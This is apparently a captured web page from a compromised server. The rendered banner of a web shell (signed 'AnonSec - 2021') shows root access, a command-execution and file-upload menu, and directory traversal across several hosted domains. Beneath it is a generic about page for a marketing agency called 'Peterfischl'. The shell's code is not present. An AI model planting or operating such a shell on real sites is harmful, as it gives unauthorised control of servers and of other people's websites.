|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/kruppvalez.com/../denisethewineshop.com/../peterfischl.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Peterfischl</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-gradient-to-r from-gray-900 to-gray-800 text-white shadow-xl">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-10 h-10 bg-gradient-to-br from-purple-500 to-pink-600 rounded-lg flex items-center justify-center">
<span class="text-white font-bold">P</span>
</div>
<span class="self-center text-xl font-bold">
Peterfischl </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-white rounded-lg md:hidden hover:bg-white/10">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-medium flex flex-col md:flex-row md:space-x-6 items-center">
<li><a href="#services" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">Services</a></li>
<li><a href="#features" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">Features</a></li>
<li><a href="#about" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">About</a></li>
<li><a href="#testimonials" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">Testimonials</a></li>
<li>
<a href="#contact" class="block py-2.5 px-6 bg-white text-gray-900 rounded-lg hover:bg-gray-100 transition-all font-semibold">
Get Started
</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-gray-900 text-white py-20" id="about">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid lg:grid-cols-2 gap-12 items-center">
<div>
<span class="text-purple-400 font-bold text-sm uppercase mb-4 block">Growth Catalysts</span>
<h2 class="text-4xl font-extrabold mb-6">Elevate Your eCommerce Business with Our Comprehensive Solutions</h2>
<p class="text-lg text-white/80 mb-8 leading-relaxed">Our digital marketing agency specializes in helping eCommerce businesses grow their sales and revenue. Our expert solutions are designed to optimize your website, boost your online visibility, and attract more customers. With our proven track record of success, we can help you maximize your eCommerce sales and take your business to the next level.</p>
<a href="#contact" class="inline-flex items-center px-8 py-4 bg-purple-600 text-white font-bold rounded-lg hover:bg-purple-700 transition-all">
Explore More </a>
</div>
<div class="relative">
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="rounded-2xl">
<div class="absolute -inset-4 border-2 border-purple-500 rounded-2xl -z-10"></div>
</div>
</div>
</div>
</section>
<section class="bg-white py-20" id="features">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center mb-16">
<span class="inline-block px-4 py-2 bg-purple-100 text-purple-800 rounded-full text-sm font-semibold mb-4">Features</span>
<h2 class="text-4xl md:text-5xl font-extrabold text-gray-900 mb-4">Why Choose Us</h2>
</div>
<div class="grid md:grid-cols-2 gap-8">
<div class="flex gap-4 bg-gray-50 rounded-xl p-6">
<div class="w-12 h-12 bg-purple-600 rounded-lg flex items-center justify-center flex-shrink-0">
<i class="fas fa-rocket text-white"></i>
</div>
<div>
<h3 class="text-lg font-bold text-gray-900 mb-1">Fast Performance</h3>
<p class="text-gray-600 text-sm">Lightning-fast results</p>
</div>
</div>
<div class="flex gap-4 bg-gray-50 rounded-xl p-6">
<div class="w-12 h-12 bg-purple-600 rounded-lg flex items-center justify-center flex-shrink-0">
<i class="fas fa-shield-alt text-white"></i>
</div>
<div>
<h3 class="text-lg font-bold text-gray-900 mb-1">Secure & Safe</h3>
<p class="text-gray-600 text-sm">Your data protected</p>
</div>
</div>
<div class="flex gap-4 bg-gray-50 rounded-xl p-6">
<div class="w-12 h-12 bg-purple-600 rounded-lg flex items-center justify-center flex-shrink-0">
<i class="fas fa-headset text-white"></i>
</div>
<div>
<h3 class="text-lg font-bold text-gray-900 mb-1">24/7 Support</h3>
<p class="text-gray-600 text-sm">Always here to help</p>
</div>
</div>
<div class="flex gap-4 bg-gray-50 rounded-xl p-6">
<div class="w-12 h-12 bg-purple-600 rounded-lg flex items-center justify-center flex-shrink-0">
<i class="fas fa-chart-line text-white"></i>
</div>
<div>
<h3 class="text-lg font-bold text-gray-900 mb-1">Proven Results</h3>
<p class="text-gray-600 text-sm">Track your success</p>
</div>
</div>
</div>
</div>
</section>
<section class="bg-gradient-to-r from-purple-600 to-pink-600 text-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid grid-cols-2 md:grid-cols-4 gap-8 text-center">
<div>
<div class="text-5xl font-black mb-2">500+</div>
<div class="text-white/90">Happy Clients</div>
</div>
<div>
<div class="text-5xl font-black mb-2">98%</div>
<div class="text-white/90">Satisfaction Rate</div>
</div>
<div>
<div class="text-5xl font-black mb-2">24/7</div>
<div class="text-white/90">Support Available</div>
</div>
<div>
<div class="text-5xl font-black mb-2">15+</div>
<div class="text-white/90">Years Experience</div>
</div>
</div>
</div>
</section>
<footer class="bg-gradient-to-r from-purple-600 to-pink-600 text-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-white/20 backdrop-blur-sm rounded-xl flex items-center justify-center">
<span class="text-white font-bold text-xl">P</span>
</div>
<span class="text-3xl font-bold">Peterfischl</span>
</a>
<p class="text-white/90 mb-6 max-w-md">Delivering exceptional services and innovative solutions.</p>
<div class="flex space-x-4">
<a href="#" class="w-12 h-12 bg-white/20 hover:bg-white/30 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/20 hover:bg-white/30 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/20 hover:bg-white/30 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/20 hover:bg-white/30 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Company</h3>
<ul class="space-y-3 text-white/80">
<li><a href="./about-us.php" class="hover:text-white transition-colors">About Us</a></li>
<li><a href="blog/" class="hover:text-white transition-colors">Blog</a></li>
<li><a href="#services" class="hover:text-white transition-colors">Services</a></li>
<li><a href="#testimonials" class="hover:text-white transition-colors">Testimonials</a></li>
<li><a href="./contact.php" class="hover:text-white transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Legal</h3>
<ul class="space-y-3 text-white/80">
<li><a href="./privacy.php" class="hover:text-white transition-colors">Privacy</a></li>
<li><a href="./terms.php" class="hover:text-white transition-colors">Terms</a></li>
<li><a href="./disclaimer.php" class="hover:text-white transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-white/20 pt-8">
<p class="text-white/80 text-sm text-center">© 2026 Peterfischl. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021